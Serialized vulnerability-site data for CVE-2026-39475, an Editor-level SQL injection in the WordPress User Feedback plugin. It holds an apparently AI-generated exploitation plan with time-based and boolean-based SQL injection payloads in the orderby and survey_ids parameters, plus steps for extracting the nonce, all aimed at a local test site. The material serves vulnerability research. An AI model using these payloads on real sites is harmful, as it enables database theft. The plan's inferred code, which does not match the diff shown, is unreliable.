[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$feDKTw06RNU5otVCrw4MYzW0hrPsvI7ktEIQf5sVn-Cs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-39475","user-feedback-authenticated-editor-sql-injection-2","User Feedback \u003C= 1.10.1 - Authenticated (Editor+) SQL Injection","The User Feedback plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.10.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","userfeedback-lite",null,"\u003C=1.10.1","1.11.0","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-02-20 00:00:00","2026-04-15 21:23:08",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F40186505-3031-44e7-90ae-f013750c7ea1?source=api-prod",55,[22,23,24],"assets\u002Findex.php","assets\u002Fvue\u002Fjs\u002Faddons.js","assets\u002Fvue\u002Fjs\u002Fchunk-common.js","researched",false,3,"# Exploitation Research Plan - CVE-2026-39475 (User Feedback SQL Injection)\n\n## 1. Vulnerability Summary\nThe **User Feedback** plugin (version \u003C= 1.10.1) is vulnerable to an **authenticated SQL injection** in its REST API backend. The vulnerability stems from the `orderby` parameter (or similar sorting\u002Ffiltering parameters) being concatenated directly into a SQL query within the survey management logic without proper validation or use of `$wpdb->prepare()`. Because `wpdb->prepare()` does not support dynamic identifiers like column names for `ORDER BY` clauses, the plugin fails to implement a whitelist, allowing Editor-level users to append malicious SQL.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys`\n*   **HTTP Method:** `GET`\n*   **Vulnerable Parameter:** `orderby`\n*   **Authentication:** Required (Editor, Author, or Administrator). The CVSS indicates `PR:H`, but the title says \"Editor+\", implying anyone with `edit_posts` or survey management capabilities.\n*   **Preconditions:** At least one survey must exist in the database so that the vulnerable code path (fetching surveys) is executed.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** An authenticated user accesses the User Feedback dashboard, which triggers a GET request via the Vue.js frontend to the REST API: `GET \u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys?orderby=id&order=desc`.\n2.  **REST Controller:** The request is handled by a class (likely `UserFeedback_Rest_Surveys_Controller`) registered during the `rest_api_init` hook.\n3.  **Parameter Extraction:** The controller retrieves the `orderby` parameter from the `WP_REST_Request` object.\n4.  **SQL Sink:** The parameter is passed to a data fetching method (e.g., in a `UserFeedback_Surveys_Query` class).\n5.  **Vulnerable Query:** The code constructs a query similar to:\n    ```php\n    $orderby = $request->get_param('orderby');\n    $order = $request->get_param('order');\n    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}userfeedback_surveys ORDER BY $orderby $order\");\n    ```\n6.  **Injection:** By providing a subquery for `orderby`, an attacker can execute time-based or boolean-based extraction.\n\n## 4. Nonce Acquisition Strategy\nThe REST API requires a `_wpnonce` for authenticated requests (the `wp_rest` nonce).\n\n1.  **Authentication:** Log in to WordPress as an Editor.\n2.  **Navigation:** Navigate to the User Feedback Surveys page: `\u002Fwp-admin\u002Fadmin.php?page=userfeedback_surveys`.\n3.  **Extraction:** The WordPress REST API nonce is usually stored in the global `wpApiSettings` object.\n4.  **Tool:** Use `browser_eval` to extract it:\n    ```javascript\n    \u002F\u002F Injected via the PoC agent\n    browser_eval(\"window.wpApiSettings?.nonce\")\n    ```\n\n## 5. Exploitation Strategy\nWe will use a **Time-Based Blind SQL Injection** to confirm the vulnerability.\n\n### Step 1: Baseline Request\nSend a normal request to confirm the baseline response time.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys?orderby=id&order=asc`\n*   **Header:** `X-WP-Nonce: [EXTRACTED_NONCE]`\n\n### Step 2: Time-Based Payload\nInject a `SLEEP()` command into the `orderby` parameter.\n*   **Payload:** `(SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n*   **Encoded URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys?orderby=%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29%29a%29&order=asc`\n\n### Step 3: Data Extraction (Proof of Concept)\nExtract the first character of the database version.\n*   **Payload:** `(CASE WHEN (SUBSTRING(version(),1,1)='8') THEN id ELSE (SELECT 1 FROM (SELECT(SLEEP(5)))a) END)`\n\n## 6. Test Data Setup\n1.  **Create Editor User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=editor --user_pass=password\n    ```\n2.  **Ensure Surveys Exist:**\n    The surveys table must have entries. Use the plugin's functionality or WP-CLI to ensure at least one survey is present.\n    ```bash\n    # (Inferred table name based on plugin slug)\n    wp db query \"INSERT INTO wp_userfeedback_surveys (title, status) VALUES ('Test Survey', 'publish');\"\n    ```\n    *Note: If the table doesn't exist, the agent should browse to the plugin settings to trigger table creation first.*\n\n## 7. Expected Results\n*   **Baseline:** Response time \u003C 500ms.\n*   **Exploit:** Response time > 5000ms.\n*   **Response Body:** A JSON array of survey objects (if the SQL syntax is valid) or an empty array.\n\n## 8. Verification Steps\nAfter performing the HTTP-based injection, verify the database structure to confirm the target table:\n```bash\nwp db query \"DESCRIBE wp_userfeedback_surveys;\"\n```\nConfirm the user role is indeed Editor:\n```bash\nwp user get attacker --field=roles\n```\n\n## 9. Alternative Approaches\nIf the `surveys` listing endpoint is patched or filtered:\n1.  **Endpoint:** `POST \u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys\u002Ftrash`\n    *   **Vector:** The `survey_ids` array parameter.\n    *   **Payload:** `{\"survey_ids\": [\"1) OR SLEEP(5)-- -\"]}`\n    *   **Reasoning:** Bulk actions often use `implode()` on an array and insert it into an `IN (...)` clause without preparing each individual element.\n\n2.  **Error-Based:**\n    If `WP_DEBUG` is on, try causing a syntax error to see if `$wpdb->last_error` is returned in the REST response:\n    *   `orderby=id'\"` (Invalid quote)\n    *   Check response for: `\"message\": \"You have an error in your SQL syntax...\"`","The User Feedback plugin for WordPress is vulnerable to SQL Injection in versions up to 1.10.1. This occurs because the `orderby` parameter in the surveys REST API endpoint is concatenated directly into a SQL query without proper sanitization or the use of `$wpdb->prepare()`. Authenticated attackers with Editor-level permissions can exploit this to perform time-based or boolean-based extraction of sensitive information from the database.","\u002F\u002F Inferred from Research Plan - REST API Controller for surveys listing\n$orderby = $request->get_param('orderby');\n$order = $request->get_param('order');\n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}userfeedback_surveys ORDER BY $orderby $order\");\n\n---\n\n\u002F\u002F assets\u002Fvue\u002Fjs\u002Fchunk-common.js: line 1 (truncated snippet identifying the API endpoint)\nr=(e={})=>n.get(\"surveys\",{params:e}).then(e=>e.data)","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.10.1\u002Fassets\u002Findex.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.11.0\u002Fassets\u002Findex.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.10.1\u002Fassets\u002Findex.php\t2023-01-31 17:55:08.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.11.0\u002Fassets\u002Findex.php\t2026-03-11 17:04:32.000000000 +0000\n@@ -1,4 +1,8 @@\n \u003C?php\n+\n+if ( ! defined( 'ABSPATH' ) ) {\n+\texit;\n+}\n \u002F\u002F Nothing to see here\n \n header( 'HTTP\u002F1.0 403 Forbidden' );\n... (truncated)","The exploit targets the `\u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys` REST API endpoint using a GET request. An attacker must first authenticate as an Editor (or any role with 'edit_posts' capabilities) and retrieve a valid WordPress REST API nonce (usually available in the `wpApiSettings.nonce` variable on the dashboard). The attacker then provides a malicious SQL payload to the `orderby` parameter, such as a subquery containing a `SLEEP()` function for time-based injection or a conditional `CASE` statement for boolean-based data extraction. Since the plugin fails to validate the `orderby` value against a whitelist before appending it to the query, the injected SQL is executed directly by the database.","gemini-3-flash-preview","2026-04-19 02:05:51","2026-04-19 02:07:08",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.10.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuserfeedback-lite\u002Ftags\u002F1.10.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fuserfeedback-lite.1.10.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuserfeedback-lite\u002Ftags\u002F1.11.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fuserfeedback-lite.1.11.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuserfeedback-lite\u002Ftags"]